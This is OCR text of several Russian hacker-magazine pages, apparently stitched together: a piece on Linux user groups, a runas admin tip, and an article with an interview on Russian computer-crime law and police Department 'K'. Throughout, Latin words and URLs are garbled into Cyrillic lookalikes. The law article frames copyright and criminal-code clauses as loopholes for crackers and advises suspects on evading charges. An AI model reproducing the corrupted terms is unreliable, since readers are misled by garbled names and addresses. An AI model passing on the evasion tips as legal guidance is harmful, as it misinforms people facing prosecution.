ние самого хакерского ЫѵеСЭ. При желании его можно ин- 
стальнуть на диск, и в последнее время этот дистр достаточно 
популярен. 

Нередко в ШО'ах практикуется выпуск е-ііпе на тему свобод- 
ного ПО или, что чаще, помощь в подготовке материалов более 
известным изданиям (Ыпих ѲаіеГГе, например). Деньги, кото- 
рые удается собрать группе, обычно идут на поддержку таких 
проектов, как Ргее Зо1Т\л/аге Роипсіаііоп, КЭЕ Ргоіесі, ѲІЧОМЕ 
Роипсіаііоп. Важно также сотрудничество с другими группами 
пользователей, которое выливается в совместные проекты и 
глобальные тусовки. 

Многие лаги становятся бета-тестерами различных компаний, рас- 
пространяющих дистрибутивы с Линуксом. Это выгодно всем: ди- 
стрибуторы узнают о багах в продуктах, тестеры получают свежай- 
шие версии и вносят свою лепту в разработку любимой системы. 
Одной из самых заметных фигур в российском ЛАГ-движении яв- 
ляется Михаил Браво, основатель питерской группы линуксо- 
идов и ее действующий координатор. Он также автор многих 
статей об ореп зоигсе, многие из которых стали появляться на 
заре Рісіопеі (Браво, помимо всего прочего, был координато- 
ром петербургской фидохи). 

Из западных активистов свободного ПО стоит отметить Рика Мау- 
эна, автора «Ппих ІІзег Ѳгоир НОѴѴТО». Этот документ уже давно 
стал настольной книгой любого лаговца. Рик интересуется дея- 
тельностью ШѲ в мире и всегда по возможности помогает груп- 
пам, где бы они ни находились. 



[организация ШѲ] Как и любая другая организация, ШѲ имеет 
руководителей. В выборах нового лидера могут участвовать все 
члены группы. Руководители ШѲ — это чаще всего энтузиасты, го- 
товые ежедневно уделять свое внимание группе, решать возника- 




[фото с одной из линуксовок] 



ющие проблемы, поддерживать веб-сайт и заниматься многими 
другими вещами. Президент, казначей, секретарь, ответственный 
за встречи — эти должности присутствуют почти в каждой группе. 
Политика лагов основывается на том, что все, что привлекает но- 
вых членов, — хорошо, а то, что их отталкивает, надо исключить. 
Мемберы соблюдают определенные правила, и одним из них яв- 
ляется активное участие в делах группы. 

Группам пользователей Ыпих оказывается поддержка компа- 
ний, занимающихся распространением Линукс. В России это 
АЗР и АП, они бесплатно предоставляют свои дистрибутивы. 
Но чтобы получить такую халяву, нужно иметь проект, посвя- 
щенный свободному ПО. Те группы, которые не поддерживают 
свой сайт и существуют только формально, вряд ли могут на 
нее рассчитывать. 

Если ты вдруг захочешь вступить в ШѲ и принять участие в сво- 
бодных проектах, прочти этот отрывок из Манифеста Ыпих ІІз- 
егз Ѳгоир: 

И В ШѲ всегда рады новым людям. Членство в группе абсолютно 
бесплатное. Являясь членом ШѲ, вы никому ничем не обязаны, но 
мы надеемся, что вы будете по возможности активно участвовать 
в развитии свободного программного обеспечения и в процес- 
сах, происходящих внутри группы. 

\2\ Возрастных ограничений для участников ШѲ не существует. 
Главное - ваша заинтересованность ОС ѲІЧІІ/Ппих и свободным 
программным обеспечением. Опыт также не играет роли. 

[з] Чтобы стать участником группы, необходимо зарегистриро- 
ваться на сайте. 

Как уже было сказано, в ШѲ нет ни возрастных, ни материальных, 
ни социальных ограничений. Линукс — это философия свободы. 
Хотя от людей, которые долгое время в группе, но не проявляют 
никакой активности, предпочитают избавляться. Что касается де- 
вушек — их не более 1,5-2% от числа всех мемберов. Так что Ли- 
нукс — чисто мужская операционка :-). 



іШ) сепіег 




Центр регистрации доменов 



Сайт начинается с домена 



737 - 06-01 



ѵѵѵѵѵѵ.піс.ги 
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[тусовки ШѲ] Чаще всего линуксовки проходят в офисах, конфе- 
ренц-залах, однако случаются и вылазки на природу. Основные 
темы общения — новости мира Ореп Зоигсе и планы по дальней- 
шему развитию группы. Именно на встречах обычно стартуют 
проекты по написанию свободного ПО, технической документа- 
ции и т.д. Ну и по традиции — пиво в немалых количествах. Пьют и 
за здоровье Линуса, и за Билли Гейтса. За последнего, есте- 
ственно, не чокаясь и стоя. 

Если вспоминать о самых нашумевших встречах, сразу прихо- 
дит на ум встреча московского лага в марте 2002 года. Прохо- 
дила она в московском зоопарке, что уже само по себе силь- 
но отличило ее от остальных встреч. Под теплым весенним сол- 
нышком собрались почти все члены группы — на тот момент 
около 150 человек. Помимо традиционных вопросов о пробле- 
мах насущных, народ читал умные доклады. Виктор Вагнер рас- 
сказал о Тгие ІІпіх ОШ, Олег Бройтман — о программировании 
на руіГюп. Проходил активный обмен дисками, совместное 
распитие пива, выдвигались бурные предложения освободить 
местного пингвина, символизирующего Ппих. Но дальше пред- 
ложений дело не зашло :). 

Еще одной исторической встречей стала нижегородская конфе- 
ренция в марте 2004 года. Проходила она в здании политехниче- 
ского института, присутствовало на ней около 50 человек совер- 
шенно разного уровня знаний. Как и на московской тусовке, 
здесь обсуждали важные вопросы о реалиях и будущем ореп 
зоигсе, читали доклады об истории Ппих, настройках, архитекту- 
ре и ПО под свободные системы. 

В апреле прошлого года на одной из таких встреч выдвинули 
идею создания европейского союза пользователей Линукс, что 
могло бы привести к значительному притоку денежных средств и 
усилению влияния ШѲ. Но, к сожалению, до сих пор эта идея так 
и не была реализована. 

[поддержка ШѲ] Есть несколько организаций, предоставляю- 
щих помощь группам пользователей Линуха. Ѳгоирз о^ Ппих ІІзегз 
Еѵегу\л/Гіеге — это программа по организации и поддержке ШѲ 
компании ЗЗС, которая издает Ппих ЗоигпаІ. Бесплатно присое- 
диниться к программе можно по адресу Шр://\ллл/\л/.55С.сот/дІие/ 
/ Г гее_//з^/лд. Еще одной подобной организацией является Кеб 
Наі, Іпс.'з ІІзег Ѳгоир Ргодгат, которая активно помогает ШѲ 
развиваться и расти. Подробная информация доступна на 
сайте РедХат. 

МапбгакеСІиЬ — это святыня всех, кто юзает продукты дистрибу- 
тора Мапбгаке. Здесь люди могут обменяться дисками, обсудить 
новости компании, получить ответы на вопросы, связанные с ман- 
дрейком. Для членов клуба доступен ЕТР-сервер, где можно ска- 
чать более 60 тысяч программ, включая коммерческий софт и 
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[вот такие они, линуксоиды] 

драйвера, материалы для изучения ІІпіх. Каждый член клуба Мапсігаке имеет собствен- 
ный логин и пароль, которые позволяют ему искать, устанавливать и конфигурировать 
новое ПО через инет с помощью специальной утилиты. В результате экономятся время 
и силы на установку. 

Про получение домена в зоне Іид.пеТя уже говорил. Прочитав эту статью, ты, возможно, захо- 
чешь вступить в Ш0, но его может и не оказаться в твоем городе. В чем проблема? Создавай 
свою группу! Сначала сделай сайт, на котором будет висеть новость об открытии новой 
группы. Не забудь зарегистрировать его на ШО.ги, где о нем узнают другие. Повесь объявле- 
ния там, где часто тусят компьютерщики: в книжных магазинах, интернет-кафе, университе- 
тах, в здании іпіегпеі-провайдеров. Найди Шпих-ориентированные компании и людей, кото- 
рые помогут тебе в твоем начинании. Найди подходящее место для встреч (если не найдешь 
помещения, собирай народ хоть в парке, но лучше все-таки офис или клуб). Назначь первую 
встречу группы и на ней обсуди с пришедшими перспективы развития. Ты познакомишься со 
многими интересными людьми и ощутишь себя активистом свободного ПО. 

ШС — это не просто клуб по интересам, это серьезная организация, в которую вступа- 
ют те, кто по-настоящему любит свободные оси и использует их. Здесь очень не любят 
тех, кто ставит ІІпіх для понта — мол, у меня Динух, я крутой хакер, а вы ламоботы виндо- 
шные. Флейма на тему «\Л/іпс1о\л/5 маздай» в ШС ты не услышишь, так как многим лагов- 
цам винда вообще параллельна, и те, кто начинает холивойны, быстро потеряют уваже- 
ние в этом кругу. Членство в группе — это не попойка раз в месяц в компьютерной тусов- 
ке. Это определенные обязанности. Например тебе запросто могут поручить переве- 
сти какую-нибудь документацию или попросят написать программу. 

Так что такие дела. Теперь ты понял, что у Ыпих есть еще один существенный аргумент 
в свою пользу. Этот аргумент — тысячи людей, вкладывающих душу в развитие ОС. 
Все они — энтузиасты, фанаты своей системы. И, в отличие от пользователей винды, 
они не только пользуются осью, но и по-настоящему любят ее. Ыпих Іюгеѵег! :) © 



[Т ірз&Тгіскг] 

Хочешь увидеть свои советы в журнале? Присылай их на адрес ЗкІуагоѵ@геаІ.хакер.ги. Ведущий рубрики Тірз&Т гіскз 

Иван СкЛЯрОВ. Иван Скляров (ЗкІуагоѵ@геаІ.хакер.ги) 

Для повседневной работы в ѴѴіп2003 Зегѵег любой админ имеет учетную запись без привиле- 
гий. А для запуска отдельных процессов использует средство ВипАз, которое может помочь 
не всегда. Для быстрого получения админских привилегий можно просто завершить процесс 
ехріогег.ехе в списке задач Тазк Мападег'а и запустить новый процесс такого вида: 

гипаз /изег:<домен или имя компа\имя юзверя> ехріогег.ехе 

Затем ввести пароль пользователя. По идее, должен появиться бывший десктоп, но ты уже 
будешь работать с привилегиями указанного юзверя. По завершении работы просто повтори 
процесс в обратную сторону. 

ВНИМАНИЕ: не закрывай окно Тазк Мападег'а, а просто сверни его, пока работаешь под 
чужой учетной записью, иначе тебя ждут непредсказуемые последствия! 

І_ехх91 8 ГіНр://ѵѵѵѵѵѵ.Іехх-і-Іат.пагосІ.ги 
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законы для которых пишут не то что непрофессионалы, а вооб 
ще далекие от компьютеров люди. 

Давай попробуем разобраться, за что можно заслужить внима 
ние спецслужб. 



ВСЕ МЫ ПРИВЫКЛИ К ТОМУ, ЧТО ЗАКОНЫ в 
НАШЕЙ СТРАНЕ СУЩЕСТВУЮТ ТОЛЬКО НА 
БУМАГЕ. ТЕМ БОЛЕЕ ЗАКОНЫ О ЗАЩИТЕ 
КОМПЬЮТЕРНЫХ ПРАВ. УЖ СЛИШКОМ ДАЛЕ- 
КИ ДЕПУТАТЫ ОТ ТАКОЙ ЖИВОТРЕПЕЩУЩЕЙ 
ПРОБЛЕМЫ, КАК СОХРАННОСТЬ ИНФОРМА- 
ЦИИ. НО, ВОПРЕКИ НАСМЕШКАМ НАД КОМПЕ- 
ТЕНЦИЕЙ МИЛИЦИИ, ВСЕ-ТАКИ ПРОСМАТРИ- 
ВАЕТСЯ НЕКОТОРЫЙ ПРОГРЕСС. В СМИ ЧА- 
ЩЕ И ЧАЩЕ ПРОСКАКИВАЮТ НОВОСТИ О ПО- 
ИМКЕ ОЧЕРЕДНОГО «ХАКЕРА», ВЗЛОМАВШЕ- 
ГО ОЧЕРЕДНОЙ БАНК. ЧЕГО ГРЕХА ТАИТЬ, 
НАША ПРЕССА ЛЮБИТ НАЗЫВАТЬ ШКОЛЬНИ- 
КОВ, СТАЩИВШИХ ПАРОЛЬ НА ДИАЛАП, 
ГРОЗНЫМИ ХАКЕРАМИ :). НО В ПОСЛЕДНЕЕ 
ВРЕМЯ ОРГАНАМ УДАВАЛОСЬ АРЕСТОВАТЬ И 
ПРОФЕССИОНАЛЬНЫХ ВЗЛОМЩИКОВ. ЗА 
ЧТО У НАС ИЩУТ, КАК У НАС НАКАЗЫВАЮТ, 

И КТО ВСЕМ ЭТИМ ЗАНИМАЕТСЯ — ОБ ЭТОМ 

МОЯ СТАТЬЯ I хЬіі (5Ігеат@о5коІпе1\ги) 

Тонкости компьютерных 
законов России 

[законы] В России законы всегда были 
больше на стороне преступника, нежели 
жертвы. Недоработанные, непродуман- 
ные, некомпетентные, они помогали избе- 
жать наказания преступникам всех ма- 
стей, несмотря на многочисленных сви- 
детелей и улики. Из-за неправильной 
формулировки порой решается исход 
всего дела. Так ситуация обстоит с обыч- 
ными преступлениями, суть которых по- 
нятна каждому и не требует специальных 
знаний — депутатам не нужно объяснять, 
что такое кража, хулиганство и т.д. Дру- 
гое дело компьютерные преступления. 



[редактирование исходников программы] 

Выдержка из статьи 25 Закона РФ «Об авторском праве и смеж- 
ных правах»: «Лицо, правомерно владеющее экземпляром про- 
граммы для ЭВМ, вправе без получения разрешения автора и без 
выплаты дополнительного вознаграждения внести в программу 
для ЭВМ или базу данных изменения, осуществляемые исключи- 
тельно в целях ее функционирования на технических средствах 
пользователя, осуществлять любые действия, связанные с функ- 
ционированием программы для ЭВМ или базы данных в соответ- 
ствии с ее назначением, а также исправление явных ошибок, если 
иное не предусмотрено договором с автором». Отсюда следует, 
что редактировать код можно, но лишь для того, чтобы адаптиро- 
вать программу под свои нужды. Понятие «адаптировать» истолко- 
вать можно по-разному, и однозначно сказать, что программа ре- 
дактировалась с нарушением закона, нельзя. Это хорошая лазей- 
ка для крэкера. 

[декомпиляция софта] 

Пункт 2 той же статьи 25 гласит, что декомпиляция программы не 
является нарушением закона, если выполняются три условия: 

Ш информация, необходимая для достижения способности к 
взаимодействию, ранее не была доступна этому лицу из других 
источников (то есть человек, купивший программу, не смог 
найти инфу о ее настройках, из-за чего программа на его ком- 
пе не запускалась); 

ВО указанные действия осуществляются в отношении только тех 
частей декомпилируемой программы для ЭВМ, которые необходи- 
мы для достижения способности к взаимодействию (тут, думаю, 
все ясно. Если у проги не пашет один модуль, то декомпилировать 
можно только его. Или декомпилировать всю софтину, но изменять 
только неработающий фрагмент); 

[з] информация, полученная в результате декомпилирования, 
может использоваться лишь для достижения способности к 
взаимодействию с другими программами, не может передавать- 



ся иным лицам, за исключением случаев, если это необходимо 
для достижения способности к взаимодействию, а также не мо- 
жет использоваться для разработки программы для ЭВМ, по сво- 
ему виду существенно схожей с декомпилируемой программой 
для ЭВМ, или для осуществления любого другого действия, на- 
рушающего авторское право. 

Соблюдая эти три условия, ты можешь без риска для себя разо- 
брать любую программу. Доказать, что ты руководствовался поб- 
уждениями, идущими вразрез с этими пунктами, будет непросто. 

[копирование ПО] 

Копировать софт по закону можно только в случае, если это бэ- 
кап. Смотрим пункт 1 статьи 25 Закона РФ «Об авторском праве 
и смежных правах»: «Лицо, правомерно владеющее экземпля- 
ром программы для ЭВМ или базы данных, вправе без получе- 
ния разрешения автора и без выплаты дополнительного возна- 
граждения изготовить копию программы для ЭВМ или базы дан- 
ных при условии, что эта копия предназначена только для архив- 
ных целей. При этом копия программы для ЭВМ или базы данных 
должна быть уничтожена в случае, если владение ей перестает 
быть правомерным». 

Обрати внимание, софт должен быть приобретен правомерно, то 
есть по лицензии производителя. Если срок лицензии истек, дубли- 
кат по закону необходимо удалить. 

[деятельность в компьютерной сети] 

Российское законодательство практически никак не регулирует 
отношения между провайдерами и их клиентами. Существуют 
только две статьи, предусматривающие наказание за сетевые 
преступления. 

Ш Статья 272 УК РФ устанавливает ответственность за «неправо- 
мерный доступ к охраняемой законом компьютерной информа- 
ции, то есть информации на машинном носителе, в электронно- 
вычислительной машине (ЭВМ), системе ЭВМ или их сети, если 
это деяние повлекло уничтожение, блокирование, модификацию 
либо копирование информации, нарушение работы ЭВМ, системы 
ЭВМ или их сети». (Я хренею. Кто эти законы формулировал? — 
Прим. тіпсІѵѵОгк.) 

Эта статья очень тесно переплетается с законом об авторском пра- 
ве, а также многими другими, связанными с документами. После 
взлома сервака (то есть, как они это называют, получения непра- 
вомерного доступа) хакеру может оказаться доступной инфа, пред- 
ставляющая собой коммерческую тайну. В этом случае впаяют уже 
минимум две статьи: 272 и статья о коммерческой тайне. Вспомни, 
как именно осуществляется серфинг по Сети и как ведет себя твой 
комп, когда ты открываешь какой-нибудь файл? Правильно, копи- 
рует его в папку ТЕМР. А это, как видно из 272 статьи, является не- 
правомерным копированием инфы. Дяди в погонах очень любят 
пришивать дополнительные статьи. Однажды программист одного 
предприятия отредактировал бухгалтерскую программу так, что 
она переводила по одному рублю от зарплаты рабочих на левый 
счет. Ему предъявили обвинения сразу по трем статьям: незакон- 
ный сбор средств о счетах пользователей, модификация информа- 



ции, принадлежащей предприятию, и мошенничество. Осудили на 
пять лет условно и лишили прав работать по специальности в тече- 
нии двух лет. 

Ш Статья 274 УК РФ предусматривает ответственность за «нару- 
шение правил эксплуатации ЭВМ, системы ЭВМ или их сети ли- 
цом, имеющим доступ к ЭВМ, системе ЭВМ или их сети, повлекш- 
ее уничтожение, блокирование или модификацию охраняемой 
законом информации ЭВМ, если это деяние причинило существен- 
ный вред». Понятие «существенности» вреда является оценочным 
и в каждом случае определяется индивидуально. 

Обе эти статьи тесно переплетены с законом об авторском пра- 
ве. То есть к нарушителю, помимо обвинений по вышеуказанным 
статьям, вполне можно применить статью 146 (нарушение автор- 
ских и смежных прав) или 150.4 (продажа, сдача в прокат и иное 
незаконное использование экземпляров произведений или фоно- 
грамм). Последняя применима и к компьютерным программам, 
так как по закону они приравнены к литературным произведе- 
ниям со всеми вытекающими последствиями. Последствия напря- 
мую зависят от характера преступления (в коммерческих целях 
было совершено или нет, при каких обстоятельствах и т.д) и 
варьируются от 5 до 50 тысяч МРОТ, которые потерпевший за- 
просто может запросить с хакера. 

Помимо взыскания штрафов в пользу правообладателя, суд может 
постановить выплатить 10% от отсуженной суммы самому себе: 
«кроме возмещения убытков, взыскания дохода или выплаты ком- 
пенсации в твердой сумме суд за нарушение авторских или смеж- 
ных прав взыскивает штраф в размере 10 процентов от суммы, 
присужденной судом в пользу истца». Шанс того, что суд заберет 
себе еще 10%, зависит от статьи, которую пришьют горе-взломщи- 
ку. В случае с законом «О правовой охране программ» при грамот- 
ном подходе юристов можно отмазаться, в случае с авторскими 
правами — нет. 

Все контрафакты обычно уничтожаются, хотя при желании право- 
обладатель может забрать их себе. Сюда относится аппаратура, 
пиратские диски и сопутствующие материалы. 

[суды] В предыдущей части ты узнал, какие законы, защищаю- 
щие виртуальную собственность, действуют в нашей стране. Ко- 
нечно, это не значит, что они всегда работают. Часто бывает так, 
что в очевидном случае следствие не может предъявить пре- 
ступнику обвинение. Связано это с нежеланием как следствия, 
так и суда придерживаться компьютерных законов. Куда проще 
рассматривать дела по старинке, чем вдаваться в компьютер- 
ные премудрости, тем более что многие компьютерные законы 
тесно переплетены с другими, не имеющими к компьютерам ни- 
какого отношения. Следователи просто работают по общей 
статье и на суде всячески избегают упоминания о виртуальной 
природе преступления. 

Обычно за чисто компьютерные преступления в нашей стране 
дают именно условный срок (неписаное правило: условно/не 
условно — зависит от твоего возраста). Тут учитывается, были ли 
пришиты другие, не ИТ-статьи УК, и если нет — хакеру грозит лишь 
крупный штраф и условный приговор. Когда следствие заходит в 
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тупик, следователи нередко шьют совсем левые статьи УК. На- 
пример при рассмотрении дела о взломе кассового аппарата 
стали придерживаться версии, что это разновидность ЭВМ, что 
открыло для обвинителей новые возможности для маневров. Ана- 
логично поступали следователи, работавшие над делами люби- 
телей поболтать по телефону за чужой счет. Сотовые телефоны 
также оказывались ЭВМ. 

При расследовании дел о незаконном доступе к информации 
в инете часто оказывается, что взломщик и жертва находятся в 
разных странах. В этом случае хакера осудят по законам той 
страны, в которой он находился в момент совершения престу- 
пления. Это правило признано многими государствами, не 
только Россией. Хотя нередко западные страны с недовери- 
ем относятся к российскому законодательству и предпочита- 
ют судить взломщика на своей территории. Естественно, до- 
биться выдачи подозреваемых дипломатическими методами 
практически невозможно, поэтому спецслужбы прибегают к 
различным хитростям. 

[управление «К»] Если с блюстителями обычных законов у нас ас- 
социируется милиция, то с виртуальными — отдел «Р». Хотя буков- 
ка «Р» уже давно устарела. Еще в 2001 году управление было ре- 
организовано и переименовано в «Отдел по борьбе с преступле- 
ниями в сфере высоких технологий и незаконным оборотом ра- 
диоэлектронных и специальных технических средств». Сопро- 
вождалось это громким скандалом, раздутым Дмитрием Чепчуго- 
вым, главой московского отделения «Р». 

На сайте сотрготаТ.ги говорится, что организация являлась са- 
мым секретным подразделением МВД, несмотря на постоянные 
интервью с ее сотрудниками, пиар-акции типа публичного задер- 
жания хакера и многочисленные публикации в прессе. Москов- 
ский отдел «К» был разбит на несколько ничем не приметных ре- 
зентур, скрывающих свое истинное предназначение. Местом для 
офиса вполне могли служить съемная квартира или гостиничный 
номер. Основной целью был контроль за радиоэфиром. Сотруд- 
ники отдела подслушивали телефонные переговоры (сотовые и 
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домашние), перехватывали пейджинговые сообщения — все это 
делалось незаконно и без ограничений. Под колпаком отдела «К» 
находились тысячи людей, среди которых были чиновники, депу- 
таты, бизнесмены и другие публичные люди. 

Все это в прошлом. Теперь отдел выполняет свои прямые обязан- 
ности, занимаясь поимкой хакеров, крэкеров, фрикеров и других 
представителей компьютерного андеграунда. Типичным приме- 
ром является следующая история. Один школьник из Владивосто- 
ка решил заняться бизнесом — копировать и продавать диски с 
хакерским софтом и вирусами. И свои услуги разрекламировал 
на специально созданном для этого сайте. Но денег на этом сру- 
бить он не успел — первым и последним его покупателем был со- 
трудник отдела «К» местного управления. Предварительная сдел- 
ка прошла спокойно — сотрудники МВД хотели поближе позна- 
комиться с товаром. Во время следующей встречи школьника за- 
держали и конфисковали всю привезенную партию СЭ. По зако- 
ну за подобное грозит до трех лет тюрьмы со штрафом 200 тысяч 
рублей. Но ввиду возраста и того обстоятельства, что парень ни- 
какой не хакер, а просто скачивал софт из сети, отделался он не- 
большим штрафом. 

Кстати, если ты не в курсе, в нашей стране существует школа ан- 
тихакеров, где обучают будущих секьюрити-экспертов, учат про- 
тивостоять хакерским атакам. Называется она «ИнформЗащита» 
(с ее бывшим сотрудником Алексеем Лукацким было интервью в 
июньском номере ][ за 2004 год. — Прим. тіпс1\л/0гк.). Некоторые 
ее преподаватели раньше работали в МВД и занимались отло- 
вом «умных» преступников. 

[процесс задержания, или как не сесть в тюрьму] В ситуации, 
когда к тебе заваливают менты, опечатывают комп и устраива- 
ют допрос, главное не растеряться. Даже если ты владелец 
порносайта и дяди в погонах, похоже, все про твои деяния 
знают, помни: твои собственные показания и есть главные ули- 
ки. Ты, наверное, удивишься, но такого слова, как «порногра- 
фия», в российском законодательстве нет. Есть лишь расплыв- 
чатое, крайне неточное определение. И если ты будешь упор- 
но молчать, избегая слова «порно», обвинение рухнет даже 
при наличии копии сайта. Тебя просто отпустят за отсутствием 
состава преступления. 

Незнание закона и болтливость — вот твои главные враги. И не 
стоит недооценивать милицию — у следователей всегда найдут- 
ся способы заставить тебя говорить. 

Многие милиционеры «забывают» про соблюдение правил и мо- 
гут проводить обыск или конфискацию без привлечения свидете- 
лей. Или даже нанести визит безо всяких на то оснований (орде- 
ра, доказательств), обвинить во всех смертных грехах и получить 
признание. Вот тебе и все расследование. 

Скорее всего, даже после оправдательного приговора ты бу- 
дешь чувствовать себя хреново. Вся эта нервотрепка, конфиско- 
ванные комп и оборудование (часто забирают даже мобилу), ко- 
торые вряд ли вернут, проблемы на работе или в институте... Все 
это заставит тебя пожалеть о содеянном, даже если содеянное — 
час работы в инете за чужой счет. 
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[интервью со специалистом по компьютерному праву и сотрудником отде- 
ла «К»] Йоу, нига, это тіпсІ\л/Огк :). ХЬіі познакомил тебя с кое-какими подроб- 
ностями из области компьютерного права. Даю башку на отсечение, тебе 
было бы интересно узнать, что обо всем этом думают специалисты по ком- 
пьютерному праву и как ситуацию видят сотрудники отдела «К». Специально 
для тебя я отыскал юриста, специализирующегося на интеллектуальной 
собственности и компьютерных законах, а также того самого сотрудника от- 
дела «К». Они согласились ответить на мои вопросы, их ответы перед тобой. 
тіпс!\л/0гк: Насколько, по-вашему, недоработаны компьютерные зако- 
ны? В чем заключаются основные недостатки? Что нужно в первую оче- 
редь изменить/привнести? Вообще, поделитесь своим видением ком- 
пьютерных законов, какими они являются сейчас. 

Антон Серго (АС): Строго говоря, в чистом виде компьютерных законов у 
нас нет. На протяжении последних десяти лет в существующих актах по- 
являются компьютерные вставки, но не всегда они адекватны действи- 
тельности. Единственный чисто компьютерный раздел у нас содержит 
только Уголовный кодекс. В связи со скандалами вокруг электронных 
объектов авторского права и сетевых библиотек появились дополнения и 
в Законе «Об авторском праве и смежных правах». Но грош им цена, если 
они не будут работать. Когда в марте этого года прокуратура ЮЗАО Мос- 
квы отказала в возбуждении уголовного дела в отношении владельцев од- 
ного из музыкальных сайтов, в прессе заявили: «В результате проверки 
прокуратурой установлено, что российский закон об авторских правах 
не содержит правовой характеристики сети Интернет, а предусматрива- 
ет имущественное право автора на распространение экземпляров свое- 
го произведения любым способом. Вместе с тем, как считает прокурату- 
ра, с юридической точки зрения распространение каких-либо экземпля- 
ров произведений в сети Интернет невозможно, так как при этом имеет 
место цифровой, а не вещественный способ передачи, в то время как 
действующее российское законодательство предусматривает обяза- 
тельность материальной формы экземпляров произведений. Кроме того, 
прокуратура заключила, что в случае распространения произведений 
через интернет новая копия произведения не создается, а создаются 
лишь условия для использования произведения потребителями». Как види- 
те, оба вывода прокуратуры весьма интересны. Как было сказано у М. 
Булгакова, «разруха не в клозетах, а в головах». 

тіпсІ\л/Огк: Мне сказали, что в каждом законе, имеющем отношение к компью- 
терам и программам, можно найти лазейку, чтобы избежать серьезного на- 
казания. Так ли это? И какие лазейки используются чаще всего? :) 

АС: Есть народная мудрость: ловятся не самые опасные, а самые глупые. Это 
верно. Но если говорить серьезно, действительно, несовершенство законов 
имеет место быть, но далеко не любое правонарушение может остаться без- 
наказанным. Шаблонных лазеек нет, вечное соревнование снаряда и брони 
есть и в юриспруденции. А к крупным лазейкам выпускаются заплатки :-). 
Сотрудник отдела «К» (К): Главных лазеек три: 

Ш отсутствие законодательного урегулирования отдельных общественных 
отношений в сфере компьютерных технологий; 

Ш неоднородность основных терминов и определений в сфере компьютер- 
ной информации по действующему законодательству; 

0 отсутствие единого толкования правоприменительными органами и судом 
соответствующих деяний, терминов и определений в сфере компьютерной 
информации, которое закономерно вытекает из предыдущего пункта. 
тіпсКлЮгк: Ожидаются ли в будущем какие-то изменения в УК относительно 
преступлений в сфере высоких технологий? 

К: Судя по содержанию проектов изменений к УК, которые в настоящее вре- 
мя готовятся в комитетах ГД, никаких изменений по этому виду преступлений 
в ближайшее время не предвидится. 

тіпсІ\л/Огк: Что при расследовании компьютерных преступлений обычно счи- 
тается доказательством и могут ли в этом качестве рассматриваться логи? 
АС: Формально доказательствами являются любые сведения, имеющие значе- 
ние для уголовного дела. Исходя из этого, да, лог-файлы могут рассматриваться 
как источник доказательств наравне со всеми другими, но так как возможность 
их корректировки достаточно велика, они не будут основой обвинения. Хотя лог- 
файлы могут быть взяты не только с компьютера подозреваемого, но и с компью- 
теров провайдеров разного уровня. Их значение в сумме безусловно возрастет. 
К: Понятие, виды, порядок сбора, правила оценки и использования дока- 
зательств изложены в разделе III УПК РФ. При этом закон не делает разли- 
чий, компьютерные это доказательства или не компьютерные. Лог-файлы 
могут использоваться в качестве источника доказательств, при этом дока- 
зательством будет не сам лог-файл, а протокол того следственного дей- 
ствия, в ходе которого он был обнаружен, изъят и осмотрен. При эксперт- 
ном исследовании ЭВМ, опять же, доказательством будет заключение 
эксперта — письменный документ об исследовании лог-файла (его рас- 
положения, реквизитов и содержания), а не сам лог-файл. 
тіпсМЭгк: Какие компьютерные преступление больше всего распро- 
странены в России? И какие компьютерные преступления чаще всего 
рассматриваются в суде? 
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АС: Думаю, воровство паролей доступа к интернету и нарушение 
авторских прав на программное обеспечение. Вообще, по дан- 
ным МВД, число киберпреступлений в 2004 году достигло почти 13 
тысяч. Это большая цифра. 

тіпс1\л/0гк: Подозреваю, что порой сотрудники отдела «К» 
превышают свои полномочия во время расследования и за- 
держания. Расскажите, как именно они их могут превысить и 
как с этим бороться? 

АС: Не так часто, как, скажем, их коллеги из силовых подразделе- 
ний... Хорошим средством является знание действующего зако- 
нодательства, о чем при необходимости сотруднику можно ве- 
жливо сообщить. Любые доказательства, полученные с наруше- 
нием закона, теряют свою ценность, а нарушение закона для со- 
трудника чревато большими неприятностями. 

К: Как правило, в отделах «К» при Бюро специальных техниче- 
ских мероприятий МВД России (так они теперь называются по- 
сле реформы структуры МВД) работают наиболее интеллекту- 
ально развитые и профессиональные сотрудники ОВД. Это об- 
условлено спецификой высокотехнологичных преступлений, с 
которыми им приходится бороться. Тот, кто не отвечает этим 
требованиям, сам переводится в другие службы и подразде- 
ления, поскольку за него никто работать не будет. Ошибки бы- 
вают, как и у специалистов других профессий, например вра- 
чей. Физическая сила при задержании применяется редко. Да 
и то, это, как правило, сотрудники силовых подразделений, 
привлекаемые к операции по задержанию преступника. Боро- 
ться с этим можно только знанием соответствующих Законов 
РФ: «О милиции», «Об ОРД», КоАП, «О связи» и «Об охране ав- 
торских и смежных прав». 

тіпс1\л/0гк: Обычно во время задержания подозреваемого «хаке- 
ра», его компьютер и технику конфискуют и впоследствии не воз- 
вращают. Даже при оправдательном приговоре. Где обычно хра- 
нят изъятую аппаратуру и как ее вернуть после суда? 

К: Последнее утверждение не соответствует действительности! 
При оправдательном приговоре компьютер и вся техника, раз- 
решенная к свободному гражданскому обороту, обязательно 
возвращается осужденному! Это происходит даже по некото- 
рым обвинительным приговорам суда. НО, ОПЯТЬ ЖЕ, ВСЕ РЕ- 
ШАЕТ СУД, А НЕ ТЕ, КТО ИЗЪЯЛ КОМПЬЮТЕРНУЮ ТЕХНИКУ! В со- 
ответствии с инструкцией о порядке и условиях хранения веще- 
ственных доказательств подобные предметы хранятся в камере 
вещественных доказательств. Они существуют в подразделе- 
ниях милиции, прокуратуры, ФСБ, военной прокуратуры, там- 
ожни и госнаркоконтроля. Отвечает за прием, выдачу и хране- 
ние вещдоков сотрудник, не относящийся к оперативным и 
следственным работникам. 

тіпсІ\л/0гк: Если идет судебный процесс по делу о компьютерном 
преступлении, а судья совершенно не разбирается в компьютер- 
ных тонкостях и не имеет опыта ведения подобных дел, каким об- 
разом он решает, какой вынести приговор? Насколько трудно 
работать с такими судьями? 

АС: Судья не обязан разбираться во всех медицинских тонко- 
стях для решения медицинского дела, также он не обязан вла- 
деть искусством компьютерного хакера. Для этого приглаша- 
ется эксперт и значимую для дела информацию переводит с 
компьютерного языка на юридический. Но курьезы, конечно, 
бывают. Несколько лет назад мы общались с одним судьей, и 
он вскользь замечает: «Вон, в журнале что-то опять про эти ва- 
ши эм-эр-зе написали». Я не понял аббревиатуры и приблизил- 
ся к журналу, на обложке которого красовалось: «Новости тех- 
нологии МРЗ». 

К: Гы! Наоборот, легко! Они один к одному повторят в обвини- 
тельном приговоре все, что 
следователь написал в обви- 
нительном заключении по уго- 
ловному делу! Я это говорю от- 
ветственно и серьезно. 
тіпс!\л/0гк: За какие престу- 
пления в сфере высоких тех- 
нологий российским зако- 
